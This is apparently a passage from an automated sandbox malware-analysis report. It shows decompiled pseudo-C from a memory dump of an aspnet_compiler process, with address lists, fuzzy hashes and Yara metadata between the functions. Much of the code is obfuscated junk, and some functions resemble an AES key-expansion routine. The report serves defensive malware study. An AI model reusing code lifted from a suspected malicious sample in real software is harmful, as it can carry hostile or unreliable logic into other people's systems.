									_t74 =  *0xe0cc32c5 | 0x34f216ef;
									asm("adc edi, 0xd9b004fa");
									 *0x2116efa8 =  *0x2116efa8 >> 0x81;
									_t30 = _t30 - 0x000000c6 & 0x000000b3;
									_t56 = 0xe0cc32b9 -  *0x49395fc0;
									_t80 = 0xe0cc32b9;
									 *0xa2f716d2 =  *0xa2f716d2 >> 0x33;
								} while (0xe0cc32b9 <= 0);
								asm("sbb ecx, [0xe2aa9076]");
								 *0x395f828e =  *0x395f828e - _t51;
								 *0x36b616d2 =  *0x36b616d2 - _t44 - 1;
								asm("sbb ebx, 0xe0cc32cc");
								asm("rol dword [0xce9d8d8c], 0x23");
								asm("scasb");
								asm("sbb ecx, [0xefa8e0cc]");
								 *0xf2ba16ef =  *0xf2ba16ef - _t56 -  *0xebb8140b;
								 *0xf9af869a =  *0xf9af869a ^ 0xc1d79c01;
								 *0x395fc3cc =  *0x395fc3cc >> 0xcb;
								_t51 = _t51 +  *0x9c420816;
								asm("stosd");
								_t30 = 0x000000d2 &  *0x32baf2c1;
								_t44 =  *0xe2a816ef -  *0xa8e0cc32 - 1 +  *0x983e0416;
								asm("cmpsw");
								_t38 = _t38 - 0x16;
								asm("adc eax, [0xa4071c62]");
								asm("ror dword [0xcc32c1db], 0xbe");
								 *0x16efa8e0 =  *0x16efa8e0 ^ _t51;
								 *0x16ef45d8 =  *0x16ef45d8 >> 0x4f;
								asm("sbb esi, [0x9ba0f4be]");
								_pop(_t56);
							} while ( *0xa899d1b4 != _t51);
							return _t30;
						} else {
							 *0x52173a78 = 0x16ef45d8;
							__eax = 0x16ef45d9;
							_push(0x16ef45d8);
							 *0xef45d88d =  *0xef45d88d << 0x9a;
							__al = __al | 0x00000016;
							return 0x16ef45d9;
						}
					}
				}
			}












                                                  0x0041cc11
                                                  0x0041cc1a
                                                  0x0041cc21
                                                  0x0041cc24
                                                  0x0041cc2f
                                                  0x0041cc3b
                                                  0x0041cc41
                                                  0x0041cc48
                                                  0x0041cc48
                                                  0x0041cc49
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c999
                                                  0x0041cc4f
                                                  0x0041cc55
                                                  0x0041cc5c
                                                  0x0041cc5f
                                                  0x0041cc65
                                                  0x0041cc6b
                                                  0x0041cc70
                                                  0x0041cc75
                                                  0x00000000
                                                  0x0041cc7b
                                                  0x0041cc7b
                                                  0x0041cc81
                                                  0x0041cc87
                                                  0x0041cc8d
                                                  0x0041cc93
                                                  0x0041cc99
                                                  0x0041cc9f
                                                  0x0041cca5
                                                  0x0041ccab
                                                  0x0041ccb2
                                                  0x0041ccb8
                                                  0x0041ccbf
                                                  0x0041cccb
                                                  0x0041ccd1
                                                  0x0041ccdd
                                                  0x0041cce3
                                                  0x0041cce9
                                                  0x0041ccf5
                                                  0x0041ccf8
                                                  0x0041ccfe
                                                  0x0041ccff
                                                  0x0041cd06
                                                  0x00000000
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c993
                                                  0x0041c993
                                                  0x00000000
                                                  0x00000000
                                                  0x0041c9a8
                                                  0x0041c9ae
                                                  0x0041c9ae
                                                  0x0041c9c6
                                                  0x0041c9cd
                                                  0x0041c9d4
                                                  0x0041c9da
                                                  0x0041c9e1
                                                  0x0041c9e4
                                                  0x0041c9ea
                                                  0x0041c9f0
                                                  0x0041c9f9
                                                  0x0041ca00
                                                  0x0041ca06
                                                  0x0041ca0b
                                                  0x0041ca11
                                                  0x0041ca1d
                                                  0x0041ca24
                                                  0x0041ca2b
                                                  0x0041ca3d
                                                  0x0041ca43
                                                  0x0041ca49
                                                  0x0041ca4b
                                                  0x0041ca4c
                                                  0x0041ca52
                                                  0x0041ca58
                                                  0x0041ca5b
                                                  0x0041ca5b
                                                  0x0041ca61
                                                  0x0041ca70
                                                  0x0041ca77
                                                  0x0041ca7e
                                                  0x0041ca84
                                                  0x0041ca85
                                                  0x0041ca96
                                                  0x0041ca9d
                                                  0x0041caaa
                                                  0x0041cab1
                                                  0x0041cab7
                                                  0x0041cab9
                                                  0x0041cac0
                                                  0x0041cac6
                                                  0x0041cad2
                                                  0x0041cad2
                                                  0x0041cad8
                                                  0x0041cade
                                                  0x0041cae1
                                                  0x0041cae4
                                                  0x0041caf6
                                                  0x0041cafc
                                                  0x0041caff
                                                  0x0041cb05
                                                  0x0041cb11
                                                  0x0041cb1b
                                                  0x0041cb24
                                                  0x0041cb24
                                                  0x0041cb2a
                                                  0x0041cb2a
                                                  0x0041cb37
                                                  0x0041cb3d
                                                  0x0041cb44
                                                  0x0041cb50
                                                  0x0041cb5e
                                                  0x0041cb65
                                                  0x0041cb69
                                                  0x0041cb81
                                                  0x0041cb87
                                                  0x0041cb8d
                                                  0x0041cb97
                                                  0x0041cb9d
                                                  0x0041cb9e
                                                  0x0041cbaa
                                                  0x0041cbb0
                                                  0x0041cbbf
                                                  0x0041cbc2
                                                  0x0041cbc8
                                                  0x0041cbcf
                                                  0x0041cbe4
                                                  0x0041cbeb
                                                  0x0041cbf7
                                                  0x0041cbf8
                                                  0x0041cc0a
                                                  0x0041cd0c
                                                  0x0041cd0c
                                                  0x0041cd11
                                                  0x0041cd12
                                                  0x0041cd13
                                                  0x0041cd1a
                                                  0x0041cd1c
                                                  0x0041cd1c
                                                  0x0041cd06
                                                  0x0041cc75

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: caa5a9f26085d14a0180f42237766e492cc4cb9f75530c2bf4884220d1d9d956
                                                  • Instruction ID: a77c3616c3e2a271e5e66b7493f37011c705a1c36615ac4bff6cfce08e1748b1
                                                  • Opcode Fuzzy Hash: caa5a9f26085d14a0180f42237766e492cc4cb9f75530c2bf4884220d1d9d956
                                                  • Instruction Fuzzy Hash: 3E811372999790CFDB06CF78D89A38A3F71F786320B49079EC9A15B1D2C37421A6CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041C717 Relevance: .2, Instructions: 171COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 45%
                                                  			E0041C717(signed int __eax, void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				intOrPtr _t26;
				signed char _t29;
				signed char _t30;
				intOrPtr _t33;
				void* _t38;
				void* _t39;
				void* _t40;
				signed char _t45;
				char _t50;
				signed int _t52;
				signed int _t59;
				intOrPtr _t64;
				void* _t79;
				signed int _t80;

				_t59 = __edi;
				_t52 = __edx;
				_t45 = __ecx;
				_pop(_t64);
				asm("cmpsw");
				_t80 = _t79 -  *0xf8cbb4ff;
				if((__eax & 0x464d3413) <= 0) {
					__esi = __esi |  *0x319ed77;
					__ah = __ah &  *0xd0357be5;
					 *0xe72c11a2 =  *0xe72c11a2 - __dl;
					__edi = __edi + 1;
					__ebx = __ebx |  *0x2c061f95;
					_push(__esi);
					asm("adc edx, [0xbabe079a]");
					__bh = __bh |  *0x288f88d0;
					__eflags = __bh;
					if(__bh > 0) {
						__ecx = __ecx - 0x9ad61376;
						__esp = __esp | 0x1a2a8d0d;
						__eflags = __esi;
						if(__eflags < 0) {
							asm("adc esp, [0x81791879]");
							if(__eflags >= 0) {
								goto L1;
							} else {
								asm("ror dword [0x9c54fe79], 0x34");
								 *0xe1bffb84 =  *0xe1bffb84 >> 0xf9;
								asm("adc eax, [0x62139113]");
								__eflags =  *0xfbf746b7 & __bl;
								__esp = __esp | 0x4b504426;
								 *0x9c551589 =  *0x9c551589 >> 0xb0;
								__eflags =  *0x9c551589;
								asm("adc [0xe1bffb84], ch");
								__ecx =  *0xe46a680d;
								return __eax;
							}
						}
					}
				}
				L1:
				_t26 =  *0x8a5b6f09;
				 *0xe2fbac3a =  *0xe2fbac3a << 0xd4;
				 *0xd80d5962 =  *0xd80d5962 >> 0x94;
				_t64 = _t64 +  *0xd42ffed1;
				asm("rol dword [0x49f30da1], 0xe6");
				_t80 = _t80 |  *0xcd6b907;
				asm("adc [0x27be62cc], ecx");
				_t33 =  *0x4c6af8e6;
				asm("rcl byte [0x61261908], 0xa0");
				asm("ror dword [0xef2805f5], 0x5e");
				L1();
				_t1 = _t59 | 0x3070619a;
				_t59 =  *0xd9fa7c9c;
				 *0xd9fa7c9c = _t1;
				asm("rcr byte [0x731c7df2], 0x27");
				if(_t26 > 0xd9c1ae8) {
					asm("adc edi, 0xfd9e09bb");
					asm("adc esi, [0x373123f3]");
					 *0xf3b326f4 =  *0xf3b326f4 << 0x43;
					_push(_t45 - 0x24c955fa ^  *0xad1f370d | 0x000000c9);
					 *0x8b9fc10a =  *0x8b9fc10a ^ _t52;
					 *0x89c3023b =  *0x89c3023b >> 0x5b;
					_pop(_t50);
					 *0x6afee6c2 =  *0x6afee6c2 << 0x8d;
					 *0xe6c91d8a =  *0xe6c91d8a | _t33 - 0x00000001 | 0x00000014;
					 *0x626bb1bd = _t52 +  *0x38460a9c;
					asm("adc al, 0x12");
					asm("ror dword [0xcaffddc7], 0x5c");
					_t80 = 0xa99f0094;
					 *0xe8df222b =  *0x9033af85;
					asm("adc dh, 0x12");
					_t29 =  *0x93002a0c;
					 *0x93002a0c = _t26 + 0x0000000a & 0x000000f9;
					asm("adc ch, 0xe3");
					 *0xc3c651b4 = _t50;
					asm("rcl dword [0x300e6fed], 0x51");
					_t59 = (_t59 +  *0xa5c54f2f - 0x00000001 |  *0x160f6aff) + 1;
					 *0xa0e5fbd6 =  *0xa0e5fbd6 >> 0x77;
					 *0x5f260af2 =  *0x5f260af2 >> 0xe3;
					_pop(_t38);
					_t45 = _t50 -  *0xd05ea5f4;
					 *0xf17fe60b =  *0xf17fe60b >> 0x94;
					asm("stosb");
					asm("adc [0xe66c437], eax");
					asm("sbb [0xc5e55ecc], eax");
					asm("sbb al, [0xba4179e2]");
					 *0xc5f4d7be =  *0xc5f4d7be >> 0xf0;
					_t39 = _t38 + 1;
					 *0xc40009f9 =  *0xc40009f9 + _t29;
					asm("ror dword [0xbb39d8a1], 0xcd");
					_t64 =  *0x84bf4e25;
					asm("scasb");
					_t52 = 0xa0 -  *0x3c55651d ^  *0xb6825ee4;
					if(0xa2 == 0) {
						asm("adc [0xb2faa87a], edi");
						_t52 = _t52 &  *0xbe1ee96d;
						 *0x3498282b =  *0x3498282b >> 0x49;
						_push(0xa5ed0368);
						_t45 = (_t45 ^  *0x8689a4e7) & 0x00000080;
						if( *0xe01eda6a * 0xad24 == 0) {
							 *0x7668bbfe =  *0x7668bbfe - _t45;
							_t30 = _t29 |  *0x1b953786;
							 *0x3412f934 =  *0x3412f934 << 0x2f;
							L1();
							 *0xe382fce6 =  *0xe382fce6 >> 0xb;
							 *0xb5082a30 =  *0xb5082a30 << 0xf0;
							asm("scasd");
							asm("sbb eax, 0x2958af36");
							 *0x931ecd94 =  *0x931ecd94 + _t80;
							_t40 = _t39 + 0xb4;
							asm("sbb [0x356c71a], dh");
							_t64 = _t64 + 1;
							_t45 = _t80;
							asm("adc eax, [0x9778e5f4]");
							 *0xaa6bb40b =  *0xaa6bb40b - _t40;
							asm("sbb [0x510b800e], ecx");
							asm("lodsd");
							_t52 = _t52 &  *0xb9c4fe8 ^  *0x6a3db73d;
							asm("ror byte [0x84306604], 0x3d");
							_t80 = _t80 + 1;
							 *0x12d55c86 =  *0x12d55c86 + _t40 -  *0xdb6f22f2;
							 *0x70491025 =  *0x70491025 << 0xa4;
							 *0xe1446d28 =  *0xe1446d28 << 0xd1;
							if( *0xe1446d28 < 0) {
								 *0x9033ac79 = _t30;
								_t45 = _t45 + 0x12;
							}
						}
					}
				}
				goto L1;
			}

















                                                  0x0041c717
                                                  0x0041c717
                                                  0x0041c717
                                                  0x0041c717
                                                  0x0041c718
                                                  0x0041c71a
                                                  0x0041c725
                                                  0x0041c72b
                                                  0x0041c731
                                                  0x0041c737
                                                  0x0041c73d
                                                  0x0041c73e
                                                  0x0041c744
                                                  0x0041c745
                                                  0x0041c74b
                                                  0x0041c74b
                                                  0x0041c751
                                                  0x0041c757
                                                  0x0041c75d
                                                  0x0041c763
                                                  0x0041c764
                                                  0x0041c76a
                                                  0x0041c770
                                                  0x00000000
                                                  0x0041c776
                                                  0x0041c776
                                                  0x0041c77d
                                                  0x0041c784
                                                  0x0041c78a
                                                  0x0041c790
                                                  0x0041c796
                                                  0x0041c796
                                                  0x0041c79d
                                                  0x0041c7a3
                                                  0x0041c7a9
                                                  0x0041c7a9
                                                  0x0041c770
                                                  0x0041c764
                                                  0x0041c751
                                                  0x0041b8c6
                                                  0x0041b8c6
                                                  0x0041b8cb
                                                  0x0041b8d2
                                                  0x0041b8d9
                                                  0x0041b8e0
                                                  0x0041b8e7
                                                  0x0041b8f3
                                                  0x0041b8f9
                                                  0x0041b8ff
                                                  0x0041b90c
                                                  0x0041b913
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b91d
                                                  0x0041b923
                                                  0x0041b92a
                                                  0x0041b93e
                                                  0x0041b944
                                                  0x0041b962
                                                  0x0041b96c
                                                  0x0041b96d
                                                  0x0041b985
                                                  0x0041b98c
                                                  0x0041b9a1
                                                  0x0041b9b1
                                                  0x0041b9cd
                                                  0x0041b9d3
                                                  0x0041b9de
                                                  0x0041b9e5
                                                  0x0041b9f2
                                                  0x0041b9f8
                                                  0x0041ba01
                                                  0x0041ba01
                                                  0x0041ba07
                                                  0x0041ba10
                                                  0x0041ba1e
                                                  0x0041ba25
                                                  0x0041ba26
                                                  0x0041ba37
                                                  0x0041ba4d
                                                  0x0041ba4e
                                                  0x0041ba5f
                                                  0x0041ba66
                                                  0x0041ba67
                                                  0x0041ba6d
                                                  0x0041ba73
                                                  0x0041ba79
                                                  0x0041ba80
                                                  0x0041ba81
                                                  0x0041ba87
                                                  0x0041ba8e
                                                  0x0041ba9a
                                                  0x0041ba9b
                                                  0x0041baa1
                                                  0x0041baa7
                                                  0x0041baad
                                                  0x0041bab3
                                                  0x0041baba
                                                  0x0041bac5
                                                  0x0041bad2
                                                  0x0041bade
                                                  0x0041bae4
                                                  0x0041baea
                                                  0x0041baf1
                                                  0x0041bafc
                                                  0x0041bb03
                                                  0x0041bb0a
                                                  0x0041bb0c
                                                  0x0041bb11
                                                  0x0041bb17
                                                  0x0041bb1f
                                                  0x0041bb25
                                                  0x0041bb26
                                                  0x0041bb33
                                                  0x0041bb39
                                                  0x0041bb4b
                                                  0x0041bb51
                                                  0x0041bb52
                                                  0x0041bb58
                                                  0x0041bb5f
                                                  0x0041bb72
                                                  0x0041bb7e
                                                  0x0041bb87
                                                  0x0041bb8e
                                                  0x0041bb94
                                                  0x0041bb9a
                                                  0x0041bb9d
                                                  0x0041bb8e
                                                  0x0041bad2
                                                  0x0041baa1
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 628fc34419259fc6aab0727b56b09dff748baeaaaae2f1cf2d46508cef855b85
                                                  • Instruction ID: 916cd5e568ece57cc542115f34d4eb872e209e3684287c5b8a1991aa6d455261
                                                  • Opcode Fuzzy Hash: 628fc34419259fc6aab0727b56b09dff748baeaaaae2f1cf2d46508cef855b85
                                                  • Instruction Fuzzy Hash: 20815472A197818FD71ADF38C88AB853FB5F752330B08035EC9A1976D6D735244ACB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402D90 Relevance: .2, Instructions: 165COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 67%
                                                  			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t69;
				signed int* _t81;
				signed int _t94;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int* _t110;
				signed int _t127;
				signed int _t129;
				signed int _t133;
				signed int _t152;
				intOrPtr _t171;

				_t81 = _a12;
				_t110 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
				_t66 =  &(_t110[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L4:
					return _t66 | 0xffffffff;
				} else {
					_t171 = _a4;
					_t69 = 0;
					_a12 = 0;
					while(1) {
						_t152 =  *(_t66 + 0x18);
						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t127 =  *_t66 ^ _t94;
						 *(_t66 + 0x1c) = _t94;
						_t96 =  *(_t66 + 4) ^ _t127;
						 *(_t66 + 0x20) = _t127;
						_t129 =  *(_t66 + 8) ^ _t96;
						 *(_t66 + 0x24) = _t96;
						 *(_t66 + 0x28) = _t129;
						if(_t69 == 6) {
							break;
						}
						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t133 =  *(_t66 + 0x10) ^ _t106;
						 *(_t66 + 0x2c) = _t106;
						_t108 =  *(_t66 + 0x14) ^ _t133;
						 *(_t66 + 0x34) = _t108;
						_t69 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t133;
						 *(_t66 + 0x38) = _t108 ^ _t152;
						_t66 = _t66 + 0x20;
						_a12 = _t69;
						if(_t69 < 7) {
							continue;
						} else {
							goto L4;
						}
						goto L6;
					}
					return 0xe;
				}
				L6:
			}
















                                                  0x00402d93
                                                  0x00402d98
                                                  0x00402da0
                                                  0x00402da9
                                                  0x00402db3
                                                  0x00402dba
                                                  0x00402dc3
                                                  0x00402dce
                                                  0x00402dd6
                                                  0x00402ddf
                                                  0x00402dea
                                                  0x00402df0
                                                  0x00402df5
                                                  0x00402dfe
                                                  0x00402e09
                                                  0x00402e11
                                                  0x00402e1a
                                                  0x00402e25
                                                  0x00402e2d
                                                  0x00402e36
                                                  0x00402e41
                                                  0x00402e49
                                                  0x00402e52
                                                  0x00402e5d
                                                  0x00402e65
                                                  0x00402e6e
                                                  0x00402e80
                                                  0x00402e83
                                                  0x00402f9f
                                                  0x00402fa4
                                                  0x00402e89
                                                  0x00402e89
                                                  0x00402e8c
                                                  0x00402e8e
                                                  0x00402e91
                                                  0x00402e91
                                                  0x00402ef6
                                                  0x00402efb
                                                  0x00402efd
                                                  0x00402f03
                                                  0x00402f05
                                                  0x00402f0b
                                                  0x00402f0d
                                                  0x00402f10
                                                  0x00402f16
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f72
                                                  0x00402f78
                                                  0x00402f7a
                                                  0x00402f80
                                                  0x00402f82
                                                  0x00402f87
                                                  0x00402f88
                                                  0x00402f8b
                                                  0x00402f8e
                                                  0x00402f91
                                                  0x00402f97
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f97
                                                  0x00402fae
                                                  0x00402fae
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                  • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
                                                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                  • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402D87 Relevance: .2, Instructions: 163COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 60%
                                                  			E00402D87(void* __eax, signed int __ebx, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t68;
				signed int* _t73;
				signed int* _t86;
				signed int _t99;
				signed int _t101;
				signed int _t111;
				signed int _t113;
				signed int* _t115;
				signed int _t132;
				signed int _t134;
				signed int _t138;
				signed int _t159;
				intOrPtr _t181;
				signed int _t183;
				signed int _t184;

				asm("out dx, eax");
				_t184 = _t183 ^ __ebx;
				asm("lahf");
				asm("bound ebp, [eax+0x55]");
				_push(_t184);
				_t86 = _a12;
				_t115 = _a8;
				_push(__ebx);
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t115 =  *_t86 & 0xff00ff00 |  *_t86 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[1] = _t86[1] & 0xff00ff00 | _t86[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[2] = _t86[2] & 0xff00ff00 | _t86[2] & 0x00ff00ff;
				_t68 =  &(_t115[1]);
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[3] = _t86[3] & 0xff00ff00 | _t86[3] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[4] = _t86[4] & 0xff00ff00 | _t86[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[5] = _t86[5] & 0xff00ff00 | _t86[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t115[6] = _t86[6] & 0xff00ff00 | _t86[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t115[7] = _t86[7] & 0xff00ff00 | _t86[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t68 | 0xffffffff;
				} else {
					_t181 = _a4;
					_t73 = 0;
					_a12 = 0;
					while(1) {
						_t159 =  *(_t68 + 0x18);
						_t99 = ( *(_t181 + 4 + (_t159 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t181 +  &(_t73[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t181 + 4 + (_t159 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t181 + 5 + (_t159 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t181 + 4 + (_t159 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t68 - 4);
						_t132 =  *_t68 ^ _t99;
						 *(_t68 + 0x1c) = _t99;
						_t101 =  *(_t68 + 4) ^ _t132;
						 *(_t68 + 0x20) = _t132;
						_t134 =  *(_t68 + 8) ^ _t101;
						 *(_t68 + 0x24) = _t101;
						 *(_t68 + 0x28) = _t134;
						if(_t73 == 6) {
							break;
						}
						_t111 = ( *(_t181 + 4 + (_t134 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t181 + 4 + (_t134 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t181 + 4 + (_t134 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t181 + 5 + (_t134 & 0x000000ff) * 4) & 0x000000ff ^  *(_t68 + 0xc);
						_t138 =  *(_t68 + 0x10) ^ _t111;
						 *(_t68 + 0x2c) = _t111;
						_t113 =  *(_t68 + 0x14) ^ _t138;
						 *(_t68 + 0x34) = _t113;
						_t73 =  &(_a12[0]);
						 *(_t68 + 0x30) = _t138;
						 *(_t68 + 0x38) = _t113 ^ _t159;
						_t68 = _t68 + 0x20;
						_a12 = _t73;
						if(_t73 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}


















                                                  0x00402d87
                                                  0x00402d88
                                                  0x00402d8d
                                                  0x00402d8e
                                                  0x00402d90
                                                  0x00402d93
                                                  0x00402d98
                                                  0x00402d9b
                                                  0x00402da0
                                                  0x00402da9
                                                  0x00402db3
                                                  0x00402dba
                                                  0x00402dc3
                                                  0x00402dce
                                                  0x00402dd6
                                                  0x00402ddf
                                                  0x00402dea
                                                  0x00402df0
                                                  0x00402df5
                                                  0x00402dfe
                                                  0x00402e09
                                                  0x00402e11
                                                  0x00402e1a
                                                  0x00402e25
                                                  0x00402e2d
                                                  0x00402e36
                                                  0x00402e41
                                                  0x00402e49
                                                  0x00402e52
                                                  0x00402e5d
                                                  0x00402e65
                                                  0x00402e6e
                                                  0x00402e80
                                                  0x00402e83
                                                  0x00402f9d
                                                  0x00402fa4
                                                  0x00402e89
                                                  0x00402e89
                                                  0x00402e8c
                                                  0x00402e8e
                                                  0x00402e91
                                                  0x00402e91
                                                  0x00402ef6
                                                  0x00402efb
                                                  0x00402efd
                                                  0x00402f03
                                                  0x00402f05
                                                  0x00402f0b
                                                  0x00402f0d
                                                  0x00402f10
                                                  0x00402f16
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f72
                                                  0x00402f78
                                                  0x00402f7a
                                                  0x00402f80
                                                  0x00402f82
                                                  0x00402f87
                                                  0x00402f88
                                                  0x00402f8b
                                                  0x00402f8e
                                                  0x00402f91
                                                  0x00402f97
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f97
                                                  0x00402fae
                                                  0x00402fae
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a4929425b199c532a1276e20fbdfd3097897da8f6577c8994652894eba5cb7e
                                                  • Instruction ID: 7d9a78862671d9a1a1aa33f1c5c384b34ce7685678d1d27e5601da64f01e5321
                                                  • Opcode Fuzzy Hash: 2a4929425b199c532a1276e20fbdfd3097897da8f6577c8994652894eba5cb7e
                                                  • Instruction Fuzzy Hash: 1C5182B3E14A214BD318CE19CC40631B792EFD8312B5F81BEDD199B397CE74E9529A90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018852A5 Relevance: .2, Instructions: 161COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E018852A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L0189EEF0(0x19779a0);
					_t104 =  *0x1978210; // 0x1421d88
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0189EB70(_t93, 0x19779a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
